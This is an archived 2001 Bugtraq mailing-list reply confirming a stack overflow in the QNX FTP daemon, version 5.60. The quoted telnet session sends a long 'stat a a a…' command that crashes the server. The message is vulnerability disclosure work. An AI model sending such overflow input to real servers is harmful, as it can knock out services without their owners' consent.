[18995] in bugtraq
Re: QNX RTP ftpd stack overflow
daemon@ATHENA.MIT.EDU (Robert A. Seace)
Sun Feb 4 23:30:15 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <200102040131.UAA09271@slartibartfast.magrathea.com>
Date: Sat, 3 Feb 2001 20:31:49 -0500
Reply-To: "Robert A. Seace" <ras@SLARTIBARTFAST.MAGRATHEA.COM>
From: "Robert A. Seace" <ras@SLARTIBARTFAST.MAGRATHEA.COM>
X-To: venglin@FREEBSD.LUBLIN.PL
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20010203092253.C675@riget.scene.pl> from "Przemyslaw Frasunek"
at Feb 03, 2001 09:22:53 AM
In the profound words of Przemyslaw Frasunek:
>
> On Fri, Feb 02, 2001 at 03:08:12PM -0800, Ted U wrote:
> > tested on qnx rtp as released on jan. 18 from get.qnx.com. doesn't work.
> > i tried significantly more a's and nothing happens. i get the normal
> > repsonse from stat.
>
> Are you sure? This is output from the same version of QNX RTP, downloaded
> yesterday from get.qnx.com:
>
> riget:venglin:~> telnet cipsko 21
> Trying 192.168.1.32...
> Connected to cipsko.gadaczka.org.
> Escape character is '^]'.
> 220 cipsko FTP server (Version 5.60) ready.
> user venglin
> 331 Password required for venglin.
> pass x
> 230 User venglin logged in.
> stat a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
> Connection closed by foreign host.
I can't speak for the downloadable QNX RTP, however I
confirmed this same behavior with the FTP server that ships
with QNX 4.25 (their highly expensive previous RTOS, which
is NOT available for free download)... The FTP server also
reports the same "Version 5.60", so I imagine they are one
and the same, anyway...
--
||========================================================================||
|| Rob Seace || URL || ras@magrathea.com ||
|| AKA: Agrajag || http://www.magrathea.com/~ras/ || rob@wordstock.com ||
||========================================================================||
"In those days spirits were brave, the stakes were high, men were real men,
women were real women and small furry creatures from Alpha Centauri were
real small furry creatures from Alpha Centauri." - THGTTG
